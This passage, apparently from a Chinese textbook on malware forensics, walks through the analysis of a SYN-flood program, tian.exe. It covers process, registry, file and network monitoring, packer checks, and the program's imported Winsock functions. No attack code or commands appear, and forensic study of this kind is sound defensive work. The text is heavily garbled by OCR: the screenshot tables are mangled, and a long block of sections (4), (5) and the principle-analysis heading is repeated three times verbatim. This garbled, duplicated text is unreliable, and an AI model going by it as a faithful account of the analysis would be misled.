在 对 tian. exe 程序 的 恶意 行为 进行 分 析 时 ,首要 的 工作 就 是 记录 分 析 开 始 时 间 和 最 后 
分 析 结 束 时 间 。 时 间 在 恶意 程序 的 取证 分 析 过 程 中 是 比较 重要 的 , 它 也 是 保证 取证 分 析 过 
程 的 真实 性 、 准 确 性 和 完整 性 的 必要 因素 。 例 如 ， 

分 析 开 始 时 间 : 2011-06-20 星期 一 11:40 

分 析 结 束 时 间 : 2011-06-20 ”星期 一 12:07 

(2) 活动 进程 监控 。 

使 用 ProcessExplorer. exe 程序 对 系统 中 当前 的 活动 进程 进行 监控 ,可 以 帮助 分 析 人 员 
查找 出 可 疑 程序 。 在 这 里 ,只 用 到 了 其 进程 名 .PID、CPU 使 用 、 内 存 占 用 、 运 行 账户 、 启 动 线 
程 数 和 镜像 路 径 等 列 项 来 对 tian. exe 进程 进行 分 析 , 如 图 16-3 所 示 。 


Thr... | Path 


Process FD 
Fa 


Private Bytes Uzer Nane ~ 
K 


CPU 
1.56 


19 C: \WINDOVS\systen32\Wwinlogon. exe 
S C; WINDOWS A =y=t en32\hen\ niprvse. exe 


图 16-3 tian. exe 运行 并 未 发 动 SYN 攻击 时 系统 活动 进程 列表 


从 图 16-3 中 可 知 ,tian. exe 程序 的 PID 为 548,CPU 使 用 为 0% ,占用 内 存量 为 1364KB, 启 
动 线程 数 为 1 ,镜像 地 址 为 C:\ 数 据 分 析 \tian. exe. 

图 16-4 是 在 tian. exe 发 动 SYN 攻击 时 测试 系统 当前 的 活动 进程 表 。 可 以 看 出 ,tian. 
exe 的 PID 为 548,CPU 使 用 为 100% ,内存 使 用 量 为 1648KB、 启 动 线程 数 为 2, 镜 像 地 址 为 


C:\ 数 据 分 析 \tian. exe。 对 比 电 子 文件 processinfo-m. TXT 和 processinfo-h. TXT, 可 以 发 
现在 tian. exe 发 动 攻击 后 ,其 自身 以 及 对 系统 造成 的 变化 有 以 下 三 项 。 

(D tian. exe 发 动 攻击 时 ,其 线程 数 从 1 增加 到 2, 其 中 前 台 界 面 主线 程 优先 级 为 10, 后 
台 攻击 线程 优先 级 为 8。 

© 其 对 CPU 的 使 用 率 从 0% 突然 增加 到 100%。 

© 其 对 内 存 的 使 用 量 从 1364KB 增加 到 1648KB。 


Process PD 


12 C+ \WINDOWS\ systen32\csrss. exe 


guuaguauuaaaaaag 


System 
Systen Idle Process 


a Ñ vinlogon. exe 19 C: \WINDOWS\ systen32\vinlogon. exe 
2,104 KNT AUTHORITY\SYSTEN 1 C: \WINDOWS\systen32\vben\wniprvse. exe 


16-4 tian. exe 运行 并 正在 进行 SYN 攻击 时 系统 活动 进程 列表 


(3) 注册 表 监 控 。 

Regmon. exe 程序 是 一 个 比较 著名 的 注册 表 变 化 监控 工具 ,其 将 操作 源头 、 操 作 方式 、 
操作 对 象 和 结果 很 好 地 结合 起 来 ,比较 适合 作为 取证 分 析 工 具 。 对 tian. exe 对 注册 表 的 修 
改 监控 方面 ,主要 从 进程 名 ,操作 方式 、 注 册 表 键 值 和 操作 结果 列 项 来 进行 。 其 监控 过 程 如 
16-5 所 示 。 


T Time I Fah 

1697 2343005562 Ü Isass:exe:956 DuerWalue  HKLMISECURITYPolicASecDesc\(Deteui) BUFFER OV 
1698 2343007469 ËJ Isass.exe:956 Ciosekey HKLWISECURITWPoiicWSecDesc SUCCESS 
1699 2343009166 ËJ Isassexe:956 Openkey HKLMISECURITA\PolicASecDesc SUCCESS 
1700 2343010521 E] Isass.exe:956 Dueryvalue  HKLMSECURITYPolioASecDesc\(Detaui) SUCCESS 
1701 2343011056 E] Isass.exe:956 Closekey HKLWVSECURITYPolicWSecDesc SUCCESS 
1702 2343058777 Ë] lsass exe-956 Closekey HKLMISECURITY Policy SUCCESS 
1703 2488708978 dË Regmonexe:1392  Openkey HKLMSotware\MicrosotWindows NTVCurrentVersioniFontSubsttutes SUCCESS 
[1704 2488711357 K Regmon exe'1392  QuerValue  HKLMiSofware\Microsot Windows NT\CurrenVersion\FontSubsttute sit NOT FOUNE 
1705 2488714218 fÉ Regmonexe1392  Closekey HKLM\Software\MicrosotiWindows NT\CurentVersian\FontSubsttutes SUCCESS 
1706 3894414520 L winlogon exe300 Dpenkey HKCU SUCCESS 
1707 3894417572 Z winlogon exe300 Openkey HKCUWppEventaVSchemesWAppsNDefaulMenuPopupVCurent SUCCESS =| 
1708 3894419479 Z winlogon exe300 DueryValue  HKCUJAppEvents\Schemes\Apps\ DefaulMenuPopup\ Current(Detault) SUCCESS 
1709 3894425201 Z winlogon-exe:900 CioseKey 人 SUCCESS 
1710 3894427109 Z winlogon exe300 Ciosekey SUCCESS 
1711 3894430542 Z] winiogon exe300 Openkey icu SUCCESS 
1712 3894432831 Z winlogon exe'900 OpenKey HKCUAppEvents\Schemes\Apps\ Defaut MenuPopup) CurrenfActive NOTFOUNC 
1713 3894433534 Z] winlogon exe300 DuerValue — HKCUNDeteul) NOTFOUNC 
1714 3834435120 Z] winlogon exe300 Closekey HKCU SUCCESS 
1715 3894438171 Z winiogon exe300 Openkey HKLMVSofwareWMicrosoltWindows\CurenfVersion SUCCESS 
1716 3894439697 Z winiogon exe300 Openkey HKLM\Sofwere\MicrosoftWindows\CurrenVersion\Sotwara\MicrosofNWindows\Cur.. NOTFOUNC 
1717 3894441223 I winlogon exe:300 Queryalue  HKLMSoftvare\MicrosofWindows\CurentVersioniMediaPath Success 
1718 3894442749 Z wiogonexe300 Closekey HKLMSoftware\MicrosotWindows\CurentVersion SUCCESS 
1719 3900061417 g Regmonexe:1392  Openkey HKLMiSofware\MicrasoiNWindows\CurrentVersion\ExploreADesktop\NameSpace SUCCESS 
1720 39.00064468 dk Regmon exe1392  EnumersteKey HKLMiSofwere\MicrosomNWindows\CurrenVersion\ExploreADesktopiNameSpace SUCCESS 
1721 3900066376 #K Regmonexe:1392  Openkey HKLM\Sofware\MicrosotWindows\CurrentVersion\ExploreDesktop\NameSpace\ SUCCESS 
1722 3900067902 #K Regmonexe:1392  QuerVale  HKLMiSoftware\MicrosotWWindows\CurenVersion\ExploreńDesktop\NameSpace\. NOT FOUNC 
1723 3900070953 #Ë Regmon exe1392  Closekey HKLMSoftware\MicrosotWindows\CurentVersion\ Explore} Desktop\NameSpace\ SUCCESS 
1724 3900022479 # Regmon exe1392  Enumeratekey  HKLMiSoftware\MicrosotiWindows\CurentVersionExploreńDesktop\NameSpace SUCCESS 
1725 3900074387 Ë Regmon axa1392  Openkey icrosofiWindows CurenfVersioniExploreñDe: eSpace, SUCCESS 
|1726 3900075912 d Regmonexe1392  QueryValue — HKLMISoftware\MicrosotWindows\CurenVersionExploreñDesktop\Name Space) NOT FOUNT 


16-5 tian. exe 运行 并 发 动 SYN 攻击 时 的 注册 表 变 化 


实践 教程 


从 图 16-5 的 监控 记录 中 并 未 发 现 tian. exe 对 注册 表 的 任何 恶意 修改 。 
(4) 文件 系统 监控 。 
Filemon. exe 与 Regmon. exe 一 样 ,是 个 非常 不 错 的 文件 系统 变化 监控 工具 , 它 能 对 任 
何 用 户 空间 程序 对 系统 文件 的 修改 进行 监督 记录 。 对 tian. exe 的 监控 主要 从 程序 名 、 操 作 
方式 、 操 作对 象 路 径 和 操作 结果 来 进行 ,如 图 16-6 所 示 。 


i T 
333 16 vmtoolsd.exe:1984 OUERYINFORMA -CA SUCCESS FileFsSizel 
334 16 vmtoolsd exe:1994 CLOSE CA SUCCESS 
335 1 项 VMwareTroy.exe:1504 QUERYINFORMA CADocuments end Settings\All Users\Application Date\YMwere SUCCESS Attributes: D 
336 1 篇 ywareTreyexe1504 QUERY INFORMA. C\Documents end Setings\Al Users\Applicaton Deta\VMware SUCCESS  Atrbutes. D 
337 16 VMwareTray exe 1504 OUERYINFORMA ”CAWDocuments and Settings\All Users\Application Dala\YMware\YMware__ SUCCESS Attributes: D 
338 16 VMwareTray exe'1504 QUERY INFORMA.. CA\Documents end Settings\All Users\Application Data\VMware\VMware.. SUCCESS Attributes: D 
339 1 VMwareTreyexe1504 OF CADocuments and Settings\All Users\Applicaton Data\VMware\VMware SUCCESS Options: Ope 
340 1 vvarsTreyexe1504 DIRECTORY  C\Documents ond Setings\Al Users\Applicaton Date\VMwore\VMwere. NO SUCHFLE  FileBothDire 
341 1 VvwareTreyexe504 CLOSE CMDocuments and SetingsWAI Users Applicaton DateiYMwore\VMwere. SUCCESS 
342 16 vmtoolsd.exe:1984 DUERYINFORMA . C:\Documents and Settings\All Users\Application Data\YMware SUCCESS Attributes: D 
343 16 vmtoolsd.exe:1984 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
344 16 vmtoolsd.exe:1984 QUERY INFORMA. C\Documents and Settings\All Users\Application Data\VMware\VMware_. SUCCESS Attributes: D 
345 1 wtoolsdexe1984 OUERYINFORMA C\Documents and Settings lI Users\Applicaton DalaVMwareiyMware SUCCESS —  Amibues D 
346 1 篇 wmtoolsdexe1984 OPEN C\Documents and Settings NI Users\Application DaiaVMwereiVMware - SUCCESS Options Ope 
347 1 入 vmtoolsd exe 1384 DIRECTORY CADocuments and Settings\All Users\Application Date\VMware\VMware.. NOSUCH PILE 。” FileBothDire 
348 1 vmtoolsd exe 1984 CLOSE CADocuments end Settings\All Users\Application Data\VMware\VMware.. SUCCESS 
39 1 OPEN C3Documents and Setings\All Users\Application Datei VMware VMware.. SUCCESS Options: Ope 
350 1 DIRECTORY  C\Documents and Setings\Al UsersVApplicaton Date\VMwore\VMware. NO SUCHFILE  FileBothDire 
351 1 CLOSE CADocuments and Settings\All Users\Application Data\VMware\VMware... SUCCESS 
352 1 VMwareTray exe:1504 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\VMware SUCCESS Attributes: D 
353 16 YMwareTray exe'1504 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
354 1 VMwareTreyexe1504  QUERYINFORMA_ C\Documents and Setings\All Users\Applicaton Deta\VMworelVMware SUCCESS —  Awibues D 
355 16 VMwareTray exe'1504 OUERYINFORMA C\Documents and Settings\All Users\Application Data\VMware\VMware.. SUCCESS Attributes: D 
356 1 VMwareTroyexe:1504 OPEN C\Documents and Setings\Al! UsersApplication Date\VMware\VMwore.. SUCCESS Options: Ope 
357 1 VMwereTrey.exe:1504 DIRECTORY  C\Documents end Setings\All Users\Application Data\VMwore\VMwere. NOSUCH FILE  FileBothDire 
358 1 篇 VMwareTioyexe1504 CLOSE CADacuments ond Setings\Al Users\Application DaleyMwareVMware _ SUCCESS 
359 1 篇 vmoolsdere1984 OUERYINFORMA . C Documents and Setings\Al UsersVApplicaton DataYMware SUCCESS  Amibues D 
360 108 vmtoolsd exe 1984 DUERYINFORMA ”CAWDocuments and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
361 189 vmtoolsd exe.1994 QUERY INFORMA ”CAWDocuments and Settings\All Users\Application Data\VMware\VMware... SUCCESS Attributes: D 
362 1 vmtoolsd exe:1994 QUERYINFORMA ，CADocuments and Setings\All Users\Application Data\YMware\YMware. SUCCESS Attributes: D aj 
图 16-6 tian. exe 运行 并 发 动 SYN 攻击 时 的 文件 系统 变化 


从 图 16-6 的 监控 记录 中 可 知 ,tian. exe 的 运行 和 发 动 SYN 攻击 时 并 未 对 文件 系统 做 


任何 修改 。 


(5) 网 络 连接 监控 。 
TcpView. exe 能 够 清晰 地 记录 本 地 与 外 界 网 络 发 生 的 任何 TCP 和 UDP 连接 ,其 记录 
项 主要 有 进程 名 、PID、 协 议 类 型 本 地 IP、 本 地 端口 、 远 程 了 ,远程 端口 .发送 数 据 包 量 和 接 
收 数据 包 量 等 。 利 用 TcpView. exe 对 tian. exe 程序 的 网 络 连接 情况 监控 就 是 使 用 以 上 介 
绍 的 列 项 进行 的 ,监控 截图 如 图 16-7 所 示 。 


Protocol Local Address 


Local Port 


Process FD 

svehost ere 1396 UDP 
hasa 956 UDP 
[E] svchost.exe 1624 UDP 
[E svchostexe 1396 UDP 
[Ssysem 4 UDP 
[svehost exe 1624 UDP 
Elias 956 upp 
Esmem 4 UDP 
(svchostexe 1772 TCP 
加 agee 1344 TCP 
[D system 4 TCP 


ervisyt-4b Bade localdoman ntp 


uervisyt-4bĉade 


uervisyt-4b8ade localdomain 


uerrisyt-4b8ade localdomain 


LISTENING 
LISTENING 
LISTENING 


16-7 tian. exe 运行 并 发 动 SYN 攻击 时 的 网 络 连接 状况 


根据 图 16-7 中 呈现 的 结果 ,并 未 发 现 tian. exe 对 外 的 任何 网 络 连接 的 进出 和 数据 包 的 


发 送 记录 。 
5) 原理 分 析 


主要 是 对 tian. exe 程序 进行 查 壳 、 脱 壳 、 跟 踪 检测 和 逆向 ,分 析 tian. exe 程序 的 运行 


原理 。 


实践 教程 


从 图 16-5 的 监控 记录 中 并 未 发 现 tian. exe 对 注册 表 的 任何 恶意 修改 。 
(4) 文件 系统 监控 。 
Filemon. exe 与 Regmon. exe 一 样 ,是 个 非常 不 错 的 文件 系统 变化 监控 工具 , 它 能 对 任 
何 用 户 空间 程序 对 系统 文件 的 修改 进行 监督 记录 。 对 tian. exe 的 监控 主要 从 程序 名 、 操 作 
方式 、 操 作对 象 路 径 和 操作 结果 来 进行 ,如 图 16-6 所 示 。 


i T 
333 16 vmtoolsd.exe:1984 OUERYINFORMA -CA SUCCESS FileFsSizel 
334 16 vmtoolsd exe:1994 CLOSE CA SUCCESS 
335 1 项 VMwareTroy.exe:1504 QUERYINFORMA CADocuments end Settings\All Users\Application Date\YMwere SUCCESS Attributes: D 
336 1 篇 ywareTreyexe1504 QUERY INFORMA. C\Documents end Setings\Al Users\Applicaton Deta\VMware SUCCESS  Atrbutes. D 
337 16 VMwareTray exe 1504 OUERYINFORMA ”CAWDocuments and Settings\All Users\Application Dala\YMware\YMware__ SUCCESS Attributes: D 
338 16 VMwareTray exe'1504 QUERY INFORMA.. CA\Documents end Settings\All Users\Application Data\VMware\VMware.. SUCCESS Attributes: D 
339 1 VMwareTreyexe1504 OF CADocuments and Settings\All Users\Applicaton Data\VMware\VMware SUCCESS Options: Ope 
340 1 vvarsTreyexe1504 DIRECTORY  C\Documents ond Setings\Al Users\Applicaton Date\VMwore\VMwere. NO SUCHFLE  FileBothDire 
341 1 VvwareTreyexe504 CLOSE CMDocuments and SetingsWAI Users Applicaton DateiYMwore\VMwere. SUCCESS 
342 16 vmtoolsd.exe:1984 DUERYINFORMA . C:\Documents and Settings\All Users\Application Data\YMware SUCCESS Attributes: D 
343 16 vmtoolsd.exe:1984 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
344 16 vmtoolsd.exe:1984 QUERY INFORMA. C\Documents and Settings\All Users\Application Data\VMware\VMware_. SUCCESS Attributes: D 
345 1 wtoolsdexe1984 OUERYINFORMA C\Documents and Settings lI Users\Applicaton DalaVMwareiyMware SUCCESS —  Amibues D 
346 1 篇 wmtoolsdexe1984 OPEN C\Documents and Settings NI Users\Application DaiaVMwereiVMware - SUCCESS Options Ope 
347 1 入 vmtoolsd exe 1384 DIRECTORY CADocuments and Settings\All Users\Application Date\VMware\VMware.. NOSUCH PILE 。” FileBothDire 
348 1 vmtoolsd exe 1984 CLOSE CADocuments end Settings\All Users\Application Data\VMware\VMware.. SUCCESS 
39 1 OPEN C3Documents and Setings\All Users\Application Datei VMware VMware.. SUCCESS Options: Ope 
350 1 DIRECTORY  C\Documents and Setings\Al UsersVApplicaton Date\VMwore\VMware. NO SUCHFILE  FileBothDire 
351 1 CLOSE CADocuments and Settings\All Users\Application Data\VMware\VMware... SUCCESS 
352 1 VMwareTray exe:1504 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\VMware SUCCESS Attributes: D 
353 16 YMwareTray exe'1504 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
354 1 VMwareTreyexe1504  QUERYINFORMA_ C\Documents and Setings\All Users\Applicaton Deta\VMworelVMware SUCCESS —  Awibues D 
355 16 VMwareTray exe'1504 OUERYINFORMA C\Documents and Settings\All Users\Application Data\VMware\VMware.. SUCCESS Attributes: D 
356 1 VMwareTroyexe:1504 OPEN C\Documents and Setings\Al! UsersApplication Date\VMware\VMwore.. SUCCESS Options: Ope 
357 1 VMwereTrey.exe:1504 DIRECTORY  C\Documents end Setings\All Users\Application Data\VMwore\VMwere. NOSUCH FILE  FileBothDire 
358 1 篇 VMwareTioyexe1504 CLOSE CADacuments ond Setings\Al Users\Application DaleyMwareVMware _ SUCCESS 
359 1 篇 vmoolsdere1984 OUERYINFORMA . C Documents and Setings\Al UsersVApplicaton DataYMware SUCCESS  Amibues D 
360 108 vmtoolsd exe 1984 DUERYINFORMA ”CAWDocuments and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
361 189 vmtoolsd exe.1994 QUERY INFORMA ”CAWDocuments and Settings\All Users\Application Data\VMware\VMware... SUCCESS Attributes: D 
362 1 vmtoolsd exe:1994 QUERYINFORMA ，CADocuments and Setings\All Users\Application Data\YMware\YMware. SUCCESS Attributes: D aj 
图 16-6 tian. exe 运行 并 发 动 SYN 攻击 时 的 文件 系统 变化 


从 图 16-6 的 监控 记录 中 可 知 ,tian. exe 的 运行 和 发 动 SYN 攻击 时 并 未 对 文件 系统 做 


任何 修改 。 


(5) 网 络 连接 监控 。 
TcpView. exe 能 够 清晰 地 记录 本 地 与 外 界 网 络 发 生 的 任何 TCP 和 UDP 连接 ,其 记录 
项 主要 有 进程 名 、PID、 协 议 类 型 本 地 IP、 本 地 端口 、 远 程 了 ,远程 端口 .发送 数 据 包 量 和 接 
收 数据 包 量 等 。 利 用 TcpView. exe 对 tian. exe 程序 的 网 络 连接 情况 监控 就 是 使 用 以 上 介 
绍 的 列 项 进行 的 ,监控 截图 如 图 16-7 所 示 。 


Protocol Local Address 


Local Port 


Process FD 

svehost ere 1396 UDP 
hasa 956 UDP 
[E] svchost.exe 1624 UDP 
[E svchostexe 1396 UDP 
[Ssysem 4 UDP 
[svehost exe 1624 UDP 
Elias 956 upp 
Esmem 4 UDP 
(svchostexe 1772 TCP 
加 agee 1344 TCP 
[D system 4 TCP 


ervisyt-4b Bade localdoman ntp 


uervisyt-4bĉade 


uervisyt-4b8ade localdomain 


uerrisyt-4b8ade localdomain 


LISTENING 
LISTENING 
LISTENING 


16-7 tian. exe 运行 并 发 动 SYN 攻击 时 的 网 络 连接 状况 


根据 图 16-7 中 呈现 的 结果 ,并 未 发 现 tian. exe 对 外 的 任何 网 络 连接 的 进出 和 数据 包 的 


发 送 记录 。 
5) 原理 分 析 


主要 是 对 tian. exe 程序 进行 查 壳 、 脱 壳 、 跟 踪 检测 和 逆向 ,分 析 tian. exe 程序 的 运行 


原理 。 


实践 教程 


从 图 16-5 的 监控 记录 中 并 未 发 现 tian. exe 对 注册 表 的 任何 恶意 修改 。 
(4) 文件 系统 监控 。 
Filemon. exe 与 Regmon. exe 一 样 ,是 个 非常 不 错 的 文件 系统 变化 监控 工具 , 它 能 对 任 
何 用 户 空间 程序 对 系统 文件 的 修改 进行 监督 记录 。 对 tian. exe 的 监控 主要 从 程序 名 、 操 作 
方式 、 操 作对 象 路 径 和 操作 结果 来 进行 ,如 图 16-6 所 示 。 


i T 
333 16 vmtoolsd.exe:1984 OUERYINFORMA -CA SUCCESS FileFsSizel 
334 16 vmtoolsd exe:1994 CLOSE CA SUCCESS 
335 1 项 VMwareTroy.exe:1504 QUERYINFORMA CADocuments end Settings\All Users\Application Date\YMwere SUCCESS Attributes: D 
336 1 篇 ywareTreyexe1504 QUERY INFORMA. C\Documents end Setings\Al Users\Applicaton Deta\VMware SUCCESS  Atrbutes. D 
337 16 VMwareTray exe 1504 OUERYINFORMA ”CAWDocuments and Settings\All Users\Application Dala\YMware\YMware__ SUCCESS Attributes: D 
338 16 VMwareTray exe'1504 QUERY INFORMA.. CA\Documents end Settings\All Users\Application Data\VMware\VMware.. SUCCESS Attributes: D 
339 1 VMwareTreyexe1504 OF CADocuments and Settings\All Users\Applicaton Data\VMware\VMware SUCCESS Options: Ope 
340 1 vvarsTreyexe1504 DIRECTORY  C\Documents ond Setings\Al Users\Applicaton Date\VMwore\VMwere. NO SUCHFLE  FileBothDire 
341 1 VvwareTreyexe504 CLOSE CMDocuments and SetingsWAI Users Applicaton DateiYMwore\VMwere. SUCCESS 
342 16 vmtoolsd.exe:1984 DUERYINFORMA . C:\Documents and Settings\All Users\Application Data\YMware SUCCESS Attributes: D 
343 16 vmtoolsd.exe:1984 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
344 16 vmtoolsd.exe:1984 QUERY INFORMA. C\Documents and Settings\All Users\Application Data\VMware\VMware_. SUCCESS Attributes: D 
345 1 wtoolsdexe1984 OUERYINFORMA C\Documents and Settings lI Users\Applicaton DalaVMwareiyMware SUCCESS —  Amibues D 
346 1 篇 wmtoolsdexe1984 OPEN C\Documents and Settings NI Users\Application DaiaVMwereiVMware - SUCCESS Options Ope 
347 1 入 vmtoolsd exe 1384 DIRECTORY CADocuments and Settings\All Users\Application Date\VMware\VMware.. NOSUCH PILE 。” FileBothDire 
348 1 vmtoolsd exe 1984 CLOSE CADocuments end Settings\All Users\Application Data\VMware\VMware.. SUCCESS 
39 1 OPEN C3Documents and Setings\All Users\Application Datei VMware VMware.. SUCCESS Options: Ope 
350 1 DIRECTORY  C\Documents and Setings\Al UsersVApplicaton Date\VMwore\VMware. NO SUCHFILE  FileBothDire 
351 1 CLOSE CADocuments and Settings\All Users\Application Data\VMware\VMware... SUCCESS 
352 1 VMwareTray exe:1504 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\VMware SUCCESS Attributes: D 
353 16 YMwareTray exe'1504 QUERY INFORMA. C:\Documents and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
354 1 VMwareTreyexe1504  QUERYINFORMA_ C\Documents and Setings\All Users\Applicaton Deta\VMworelVMware SUCCESS —  Awibues D 
355 16 VMwareTray exe'1504 OUERYINFORMA C\Documents and Settings\All Users\Application Data\VMware\VMware.. SUCCESS Attributes: D 
356 1 VMwareTroyexe:1504 OPEN C\Documents and Setings\Al! UsersApplication Date\VMware\VMwore.. SUCCESS Options: Ope 
357 1 VMwereTrey.exe:1504 DIRECTORY  C\Documents end Setings\All Users\Application Data\VMwore\VMwere. NOSUCH FILE  FileBothDire 
358 1 篇 VMwareTioyexe1504 CLOSE CADacuments ond Setings\Al Users\Application DaleyMwareVMware _ SUCCESS 
359 1 篇 vmoolsdere1984 OUERYINFORMA . C Documents and Setings\Al UsersVApplicaton DataYMware SUCCESS  Amibues D 
360 108 vmtoolsd exe 1984 DUERYINFORMA ”CAWDocuments and Settings\All Users\Application Data\YMwere SUCCESS Attributes: D 
361 189 vmtoolsd exe.1994 QUERY INFORMA ”CAWDocuments and Settings\All Users\Application Data\VMware\VMware... SUCCESS Attributes: D 
362 1 vmtoolsd exe:1994 QUERYINFORMA ，CADocuments and Setings\All Users\Application Data\YMware\YMware. SUCCESS Attributes: D aj 
图 16-6 tian. exe 运行 并 发 动 SYN 攻击 时 的 文件 系统 变化 


从 图 16-6 的 监控 记录 中 可 知 ,tian. exe 的 运行 和 发 动 SYN 攻击 时 并 未 对 文件 系统 做 


任何 修改 。 


(5) 网 络 连接 监控 。 
TcpView. exe 能 够 清晰 地 记录 本 地 与 外 界 网 络 发 生 的 任何 TCP 和 UDP 连接 ,其 记录 
项 主要 有 进程 名 、PID、 协 议 类 型 本 地 IP、 本 地 端口 、 远 程 了 ,远程 端口 .发送 数 据 包 量 和 接 
收 数据 包 量 等 。 利 用 TcpView. exe 对 tian. exe 程序 的 网 络 连接 情况 监控 就 是 使 用 以 上 介 
绍 的 列 项 进行 的 ,监控 截图 如 图 16-7 所 示 。 


Protocol Local Address 


Local Port 


Process FD 

svehost ere 1396 UDP 
hasa 956 UDP 
[E] svchost.exe 1624 UDP 
[E svchostexe 1396 UDP 
[Ssysem 4 UDP 
[svehost exe 1624 UDP 
Elias 956 upp 
Esmem 4 UDP 
(svchostexe 1772 TCP 
加 agee 1344 TCP 
[D system 4 TCP 


ervisyt-4b Bade localdoman ntp 


uervisyt-4bĉade 


uervisyt-4b8ade localdomain 


uerrisyt-4b8ade localdomain 


LISTENING 
LISTENING 
LISTENING 


16-7 tian. exe 运行 并 发 动 SYN 攻击 时 的 网 络 连接 状况 


根据 图 16-7 中 呈现 的 结果 ,并 未 发 现 tian. exe 对 外 的 任何 网 络 连接 的 进出 和 数据 包 的 


发 送 记录 。 
5) 原理 分 析 


主要 是 对 tian. exe 程序 进行 查 壳 、 脱 壳 、 跟 踪 检测 和 逆向 ,分 析 tian. exe 程序 的 运行 


原理 。 


(1) 查 壳 。 

利用 PEiD. exe 对 tian. exe 进行 加 壳 与 否 检测 , hn t 8 f#ë X J 6. 5 则 说 明 tian. exe 经 
过 某 个 压缩 .加密 ,否则 ,tian. exe 尚未 加 壳 。 将 PEiD. exe 程序 设置 为 深度 检测 模式 ,可 以 
更 好 地 对 tian. exe 进行 查 过 。 对 tian. exe 查 壳 截图 如 图 16-8 所 示 。 


Eztra Information 


FileName: 所 程序 分 析 Wian,exej 
Detected: Microsoft Visual C++ 6.0 


图 16-8 PEiD 对 tian. exe 程序 查 壳 


通过 图 16-8 可 知 , tian. exe 是 作者 使 用 Microsoft Visual C++ 6.0 编程 所 得 ,其 
Entropy 值 为 5.6 ,小 于 6. 5 W tian. exe 程序 并 未 经 过 加 壳 处 理 。 

(2) 跟踪 检测 。 

该 过 程 主要 是 LoadPE. exe 对 tian. exe 进行 注入 跟踪 检测 ,分析 其 基本 信息 、 调 用 的 动 
态 链 接 库 以 及 其 导入 表 。Tian. exe 调用 动态 链接 库 如 图 16-9 所 示 。 


°: W 
N. ysten32 A kernal32 dll Tce00000 — 0011E000 
eN systen32\nfe42. dl T3030000 0001000 
eih systen32\nsvert. dll T78P0000 00058000 
systen32\gdi32. dl TTEFP0000 00049000 
aysten2\urer32. dl T7Dl0000 00090000 
ysten32Vshel132 Ql TD590000 0074000 
Awindows\systen32\advapi32. dll TT7DA0000 。 000A9000 
K systend2\rpert4. dl TTESOO0O 00083000 
K ysten32Vsecur32 Ql TTFC0000 00011000 
i) c: \vindows\systen32\shlwapi. Ql TTF40000 00076000 
Awindows\systen32\ws2_32. dll TIlA20000 00017000 
Awindows\systen32\ws2help. dll TIAIODOO 00008000 

N. 


systen32\ian32. dll 76300000 00010000 


Ë 

è: 
B: 
Š: 
FB 
3 
[El 


图 16-9 tian. exe 程序 调用 的 系统 动态 链接 库 列 表 


从 图 16-9 中 可 以 看 出 ,tian. exe 程序 调用 的 系统 动态 链接 库 比 较 多 ,这 里 主要 分 析 
msvcrt. dll 和 ws2_32. dll 两 个 动态 链接 库 。 以 只 读 方 式 将 tian. exe 程序 载 人 到 PE 编辑 器 
里 , 单 击 “ 目 录 ” 按 钮 ,可 以 查看 到 msvcrt. dll 和 ws2_32. dll 对 应 的 导入 函数 。 

msvcrt. dll 的 导入 函数 如 图 16-10 所 示 。 

根据 图 16-10 可 知 ,msvcrt. dll 主要 实现 相关 C 语言 函数 的 调用 。 

ws2_32. dll 的 导入 函数 如 图 16-11 所 示 。 

分 析 图 16-11 可 知 ,tian. exe 主要 引用 了 ws2_32. dll 的 WSASocketA、WSAStartup 和 
sendto 函数 实现 网 络 连接 和 数据 包 的 发 送 。 


IFN TasS 雪 E | 
实践 教程 


III 名 称 OriginalFir... | 日 期 时 间 标 志 . ForwarderChain | 名 称 | FirstThunk | 


KERNEL32. dll — D0000000 00000000 00000000 0000708C 00003000 
WEC42. DLL 00000000 O0000000 00000000 0000710 00003020 

dll 0 
SIELL32. 411 00000000 00000000 00000000 00007234 00003248 
USER32. 411 00000000 00000000 00000000 00007250 00003250 ika 
ThunkRVA | Thunk 偏 移 | Thunk (Ë 示 | 好 I 名 称 [<| 
000031F0 000023F0 00007120 — 02B4 printf 
000031F4 000023F4 0000712A 004C ~ _ CxxFraneHandler 


000031F8 000023F8 0000713E D2BC rand 
000031FC 000023FC 00007146 0253 atoi 


00003200 00002400 00000714E 0058 — dlonexit 

00003204 00002404 000071SC 0193 onexit 

00003208 00002408 00007166 0007 exit 

0000320C  0000240C O000716E 004B CXcptFilter 

nnnnaotn nnnnpatn ANTI noct 

[hunk $: 15h / 214 (FirstThunk chain) 口 总 是 查看 Fi 


图 16-10 tian. exe 导入 的 msvert. dll 函数 


OriginalFir... | 日 期 时 间 标志 | ForwarderChain | 名 称 FirstThunk 


00000000 00000000 00007114 000031F0 
00000000 00000000 00007234 00003248 
00000000 00007250 00003250 

J s 


ThunkRYA | Thunk 偏 移 | Thunk 值 | 好 I 名 称 


0000247C 000072FC htonl 
00002480 00007304 htonl 


00002484 0000730C htons 
00002488 00007314 inet_addr 
0000248C 00007320 setsockopt 
00002490 0000732E WSASocketh 
00002494 0000733C WSAStartup 


00003298 00002498 0000734A sendto 


Thunk $: 8h / 8d (FirstThunk chain) [ O 总 是 查看 FirstThunk(y) 


16-11 tian. exe 导入 的 ws2_32. dll 函数 


(3) 逆向 分 析 。 

反 汇 编 可 以 实现 程序 的 机 器 码 到 汇编 语言 的 转换 .能够 帮助 分 析 人 员 对 某 个 程序 本 身 
的 编程 原理 和 过 程 进行 深入 的 掌握 。 以 下 各 图 (图 16-12 一 图 16-15) 所 示 为 tian. exe 程序 
进行 socket 的 初始 化 .RAW 的 建立 和 大 量 数 据 包 发 送 的 反 汇 编 截图 。 


从 图 16-12 所 示 的 反 汇 编 代 码 可 以 看 出 tian. exe 加 载 ws2_32. dll .利用 WSAStartup 
函数 进行 初始 化 的 过 程 。 
